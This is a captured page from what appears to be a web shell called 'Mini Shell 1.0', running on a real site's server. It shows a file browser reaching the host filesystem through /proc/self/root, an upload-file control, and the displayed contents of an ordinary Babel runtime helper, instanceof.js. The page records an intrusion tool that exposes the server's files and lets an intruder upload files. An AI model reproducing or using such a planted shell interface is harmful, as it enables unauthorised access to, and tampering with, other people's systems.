HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/share/node_modules/@babel/runtime-corejs3/helpers/esm/
Upload File :
Current File : //proc/self/root/usr/share/node_modules/@babel/runtime-corejs3/helpers/esm/instanceof.js
import _Symbol from "@babel/runtime-corejs3/core-js/symbol";
import _Symbol$hasInstance from "@babel/runtime-corejs3/core-js/symbol/has-instance";
export default function _instanceof(left, right) {
  if (right != null && typeof _Symbol !== "undefined" && right[_Symbol$hasInstance]) {
    return !!right[_Symbol$hasInstance](left);
  } else {
    return left instanceof right;
  }
}